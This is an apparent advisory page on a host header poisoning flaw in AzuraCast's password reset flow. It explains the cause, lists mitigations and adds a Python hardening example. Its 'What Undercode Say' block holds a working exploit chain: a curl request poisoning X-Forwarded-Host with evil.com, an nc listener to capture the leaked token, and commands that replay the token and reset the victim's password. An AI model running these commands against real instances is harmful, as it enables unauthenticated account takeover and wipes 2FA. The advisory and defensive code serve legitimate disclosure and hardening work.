The vulnerability arises from the `ApplyXForwarded` middleware (lines 35-40), which blindly trusts any client-supplied `X-Forwarded-Host` header without validating the source IP. In the default Docker deployment, nginx's `fastcgi_pass` passes all client headers through to PHP-FPM, unlike `proxy_pass`, which filters them. An attacker can therefore set `X-Forwarded-Host: evil.com` when calling `/forgot`. `Router::buildBaseUrl()` (lines 53-77) uses the poisoned host because `prefer_browser_url` defaults to true, overriding any configured `base_url`. `ForgotPasswordAction.php` (lines 72-77) then generates an absolute reset URL from this poisoned host, embedding the valid token. The victim receives an email linking to `https://evil.com/login-token/...` and clicks it, leaking the token to the attacker's server. The attacker then uses that token on the real instance; when the password is reset, `LoginTokenAction.php` (lines 74-75) sets the user's 2FA secret to null. This yields full account takeover without any prior authentication, bypassing 2FA entirely.
<h2 style="color: blue;">dailycve form</h2>
Platform: AzuraCast
Version: All versions
Vulnerability: Host header poisoning
Severity: Critical
Date: 2026-05-04
<h2 style="color: blue;">Prediction: Not disclosed yet</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<pre><code class="language-shell"># Trigger poisoned password reset
curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -d "[email protected]"

# Simulate token capture (evil.com log)
nc -lvnp 80

# Extract token from request path
grep -oP '/login-token/\K[a-f0-9]+' access.log

# Use token on real instance (CSRF extraction)
curl -c cookies.txt https://target.azuracast.example/login-token/TOKEN
csrf=$(grep -oP 'csrf" value="\K[^"]+' response.html)
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/TOKEN \
  -d "csrf=$csrf&password=Owned123"
</code></pre>
<h2 style="color: blue;">Exploit:</h2>
1. Send POST `/forgot` with `X-Forwarded-Host: attacker.com`
2. Victim clicks email link → token sent to attacker.com
3. Attacker replays token to reset password (2FA wiped)
4. Log in as victim with new password
<h2 style="color: blue;">Protection from this CVE</h2>
- Add trusted proxy allowlist in `ApplyXForwarded.php` (check REMOTE_ADDR against `['127.0.0.1','nginx','web']`)
- Force `base_url` for security emails instead of request host
- Remove `$user->two_factor_secret = null;` from password reset flow
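The first two mitigations above, shown as an added example in Python. This is not AzuraCast's own code: the middleware in the project is PHP, and the function names (`resolve_host`, `build_reset_url`), the header mapping, and the proxy networks in `TRUSTED_PROXIES` are all assumptions constructed for illustration (the advisory's `nginx`/`web` Docker service names would have to be resolved to addresses at startup; sample RFC 5737 and Docker-style ranges are used here). The point it demonstrates is that `X-Forwarded-Host` is honoured only when the TCP peer (`REMOTE_ADDR`) is an allowlisted proxy, and that a security-sensitive link such as the password reset URL always uses the operator-configured base URL when one is set, so a `prefer_browser_url`-style setting cannot override it.

```python
import ipaddress
from typing import Mapping, Optional, Sequence

# Hypothetical allowlist of reverse-proxy networks (constructed sample values).
# In a real deployment this is the loopback address plus the addresses of the
# nginx/web containers, resolved once at startup.
TRUSTED_PROXIES: Sequence[str] = ("127.0.0.1/32", "172.18.0.0/16")


def is_trusted_proxy(remote_addr: str, trusted: Sequence[str] = TRUSTED_PROXIES) -> bool:
    """True only if remote_addr parses as an IP inside one of the trusted networks."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        # Garbage or empty REMOTE_ADDR is never trusted.
        return False
    return any(addr in ipaddress.ip_network(net, strict=False) for net in trusted)


def _header(headers: Mapping[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup (header names arrive in mixed case)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def resolve_host_vulnerable(remote_addr: str, headers: Mapping[str, str], server_host: str) -> str:
    """The flawed behaviour described in the advisory: any client can set the host."""
    return _header(headers, "X-Forwarded-Host") or server_host


def resolve_host(remote_addr: str, headers: Mapping[str, str], server_host: str) -> str:
    """Hardened form: honour X-Forwarded-Host only from an allowlisted proxy.

    A client talking directly to PHP-FPM (or to nginx with fastcgi_pass, which
    forwards every client header) is not on the allowlist, so its header is ignored
    and the server's own configured host name is used instead.
    """
    forwarded = _header(headers, "X-Forwarded-Host")
    if forwarded and is_trusted_proxy(remote_addr):
        # A proxy chain may append several hosts; the first is the client-facing one.
        return forwarded.split(",")[0].strip()
    return server_host


def build_reset_url(
    remote_addr: str,
    headers: Mapping[str, str],
    server_host: str,
    configured_base_url: Optional[str],
    token: str,
) -> str:
    """Build the password-reset link used in the security email.

    When the operator has configured base_url it always wins, regardless of any
    browser-URL preference, so a poisoned request host can never reach the email.
    """
    if configured_base_url:
        base = configured_base_url.rstrip("/")
    else:
        base = "https://" + resolve_host(remote_addr, headers, server_host)
    return f"{base}/login-token/{token}"


if __name__ == "__main__":
    # Constructed request: an external client injecting the header directly.
    hdrs = {"X-Forwarded-Host": "evil.com"}
    print(resolve_host_vulnerable("203.0.113.10", hdrs, "radio.example"))  # evil.com
    print(resolve_host("203.0.113.10", hdrs, "radio.example"))             # radio.example
    print(build_reset_url("203.0.113.10", hdrs, "radio.example", "https://radio.example", "TOKEN"))
```

Both checks are needed together: the allowlist stops a direct client from spoofing the host, and forcing `base_url` for security emails removes the dependency on request data entirely, which also covers deployments where the allowlist is misconfigured.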
Impact:
- Full account takeover (admin → instance compromise)
- 2FA bypass (secret destroyed on reset)
- Unauthenticated; requires victim email click
Sources:
Reported By: github.com